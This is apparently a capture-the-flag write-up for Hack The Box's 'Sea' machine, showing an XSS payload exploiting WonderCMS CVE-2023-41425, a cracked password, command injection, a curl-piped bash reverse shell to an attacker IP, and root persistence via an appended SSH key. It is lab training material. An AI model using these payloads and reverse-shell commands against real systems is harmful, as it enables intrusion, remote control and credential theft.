Post

Sea - Easy - Linux

Sea - Easy - Linux

Nmap Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Nmap 7.94SVN scan initiated Sat Aug 10 15:12:26 2024 as: nmap -sCV -p- -v -oN portscan.log 10.10.11.28
Nmap scan report for 10.10.11.28
Host is up (0.037s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
| http-methods: 
|_  Supported Methods: HEAD POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: Host: sea.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 10 15:15:48 2024 -- 1 IP address (1 host up) scanned in 202.16 seconds

Inspecting Port 80

Screenshot of the website being hosted by Apache on port 80.

4fa38c9a6ce6933598d2788908ae12b3.png

URL: sea.htb/contact.php

A contact form which is requested a URL for a website. Since a website is being requested there could be a script automating visits to the link the user provides.

d3f85e756149a40b7ef860b79f6f5e7f.png

XXS Testing

Testing the theory and submitting a URL to my own server to see if anything hits it.

Request

Screenshot of the request before submitting it.

d9c941a4e869ab142478680916d953e8.png

Reponse

The box hits my server proving there is a script automating the process. This strongly hints towards XSS. When I completed the box on release this script was not functioning properly and the box required a reset to fix it.

bb474c712f1e347b171f50f80cb2d0e8.png

WonderCMS - CVE-2023-41425

Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

Source: https://nvd.nist.gov/vuln/detail/CVE-2023-41425

POC: https://github.com/prodigiousMind/CVE-2023-41425/tree/main

Testing POC

The script needed to be modified to load the zip from my own web server which the box has access to. Since machines on Hack the Box have no internet they cannot download from GitHub.

Modifications

Highlight of the modifications.

1
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.6/main.zip&directoryName=violet&type=themes&token=" + token;

Payload (xss.js)

The XSS payload in full.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
var url = "http://sea.htb/";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).pathname; 
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.6/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "10.10.14.6";
       var port = "9001";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();
       
     }
   };
 }
};

Payload (test.html)

The web page in full linking to the Javascript payload.

1
<script src="http://10.10.14.6/xss.js"></script>

Payload Response

The below screenshot shows the target visting the web page and also loading the XSS payload.

5b8dd6a23681bb3161fd5f3ccc6b6102.png

Uploaded Shell

The exploit seems to have worked correctly. Not getting a 404 when visiting the expected location of the shell. The error message can be ignored.

5f4e7e247db03bd01cbb659774aed0ca.png

Passing the IP/Port via the paramaters as below to obtain a reverse shell.

7b785b09c0bee5f8a76eefb354d77cc4.png

Reverse Shell Obtained

Screenshot showing the result. Reverse shell obtained.

efa031f14c1e1711f17964796304f98c.png

Hashed Credentials (/var/www/sea/data/database.js)

Hashed password discovered in a database.js file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
    "config": {
        "siteTitle": "Sea",
        "theme": "bike",
        "defaultPage": "home",
        "login": "loginURL",
        "forceLogout": false,
        "forceHttps": false,
        "saveChangesPopup": false,
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
        "lastLogins": {
            "2024\/08\/11 17:22:05": "127.0.0.1",
            "2024\/08\/11 17:22:04": "127.0.0.1",
            "2024\/08\/11 17:21:04": "127.0.0.1",
            "2024\/08\/11 17:21:03": "127.0.0.1",
            "2024\/08\/11 17:20:03": "127.0.0.1"
        },

Cracking Hash

The hash was bcrypt and thankfully cracked very quickly. Password: mychemicalromance.

1
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance

Checking /etc/passwd for users

There are only two users of interest. amay and geo.

1
2
amay:x:1000:1000:amay:/home/amay:/bin/bash
geo:x:1001:1001::/home/geo:/bin/bash

SSH Access (amay)

The password recovered in a previous step worked for the amay user. SSH access obtained.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~/hackthebox/sea]
└─$ ssh amay@sea.htb            
amay@sea.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun 11 Aug 2024 03:42:39 PM UTC

  System load:  0.0               Processes:             338
  Usage of /:   62.8% of 6.51GB   Users logged in:       0
  Memory usage: 14%               IPv4 address for eth0: 10.10.11.28
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug 11 15:43:32 2024 from 10.10.14.5
amay@sea:~$ 

Checking Sudo permissions

Nothing interesting here.

1
2
3
4
amay@sea:~$ sudo -l
[sudo] password for amay: 
Sorry, user amay may not run sudo on sea.
amay@sea:~$ 

Internal Ports

Netstat revealed there is a service running internally on port 8080.

1
2
3
4
5
6
7
amay@sea:~$ netstat -antp | grep -i LIST
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:45001         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6     187      0 :::80                   :::*                    LISTEN      - 

Inspecting Port 8080

Since port 8080 is commonly used by web servers I will try curl it. Results returned a web page showing authenication is required.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
amay@sea:~$ curl localhost:8080 -vvv
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET / HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 401 Unauthorized
< Host: localhost:8080
< Date: Sun, 11 Aug 2024 17:27:07 GMT
< Connection: close
< X-Powered-By: PHP/7.4.3-4ubuntu2.23
< WWW-Authenticate: Basic realm="Restricted Area"
< Content-type: text/html; charset=UTF-8
< 
* Closing connection 0
Unauthorized access

Tunneling to Port 8080

Created a tunnel so I can access the service on my machine.

1
2
li㉿kali)-[~/hackthebox/sea]
└─$ ssh -L 8081:127.0.0.1:8080 amay@sea.htb

Port 8080 via Firefox

Basic authenication is requesting a username and password.

f5da972e8e2d142b6debb3c36bee2519.png

Credential Reuse (amay)

Using the known username and password it was possible to authenicate and view the web page. It seems to be a control panel thats under development and has several features.

4a043d88390f1b8dc250059f21cd33f1.png

Command Injection

After much testing I eventually discovered a parameter which was vulnerable to command injection. Before testing for command injection I experimented with reading files via the analyze log file feature. I also fuzzed for hidden parameters and nothing of interest was discovered for both tests.

Vulnerable Parameter (PING TEST)

The log_file parameter is vulernable to command injection when its appended with && + ping -c 3 10.10.14.6.

1
log_file=/var/log/apache2/access.log&&ping -c 3 10.10.14.6&analyze_log=

Full Request

The request in full to ping my machine to prove RCE.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
POST / HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://localhost:8081
Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==
Connection: keep-alive
Referer: http://localhost:8081/
Cookie: _pk_id.1.1fff=80ead113d394f9d8.1714626511.; zmSkin=classic; zmCSS=base
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

log_file=%2Fvar%2Flog%2Fapache2%2Faccess.log%26%26ping+-c+3+10.10.14.6&analyze_log=

Ping Recieved

Screenshot showing the target pinging my machine proving RCE was obtained.

8e9ea4a03eadecd98d970ab45aa258ac.png

Reverse Shell Payload

File containing a bash reverse shell which will be hosted on a python web server.

1
2
3
┌──(kali㉿kali)-[~/hackthebox/sea]
└─$ cat shell    
bash -i >& /dev/tcp/10.10.14.6/9001 0>&1

Parameter Payload

The command in full to download the file containing the shell and piping it directly to bash to be executed.

1
log_file=/var/log/apache2/access.log&&curl 10.10.14.6/shell|bash&analyze_log=

Reverse Shell (root)

It worked. For some reason the shell would die a few seconds after establishing a connection. There was enough time to execute commands by having it saved in the copy/paste buffer ready to go. I read the root.txt file this way. I also added keys to root’s configuration which allowed root access via SSH.

3126bae6522155816f9e31a810a533dc.png

Adding SSH Keys (root)

The command used to write SSH keys to root profile.

1
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOqQqZgFQhQP1ZZnQfcS+LXmBzBmDD8rTu5AgrSMpxIE kali@kali" >> /root/.ssh/authorized_keys
This post is licensed under CC BY 4.0 by the author.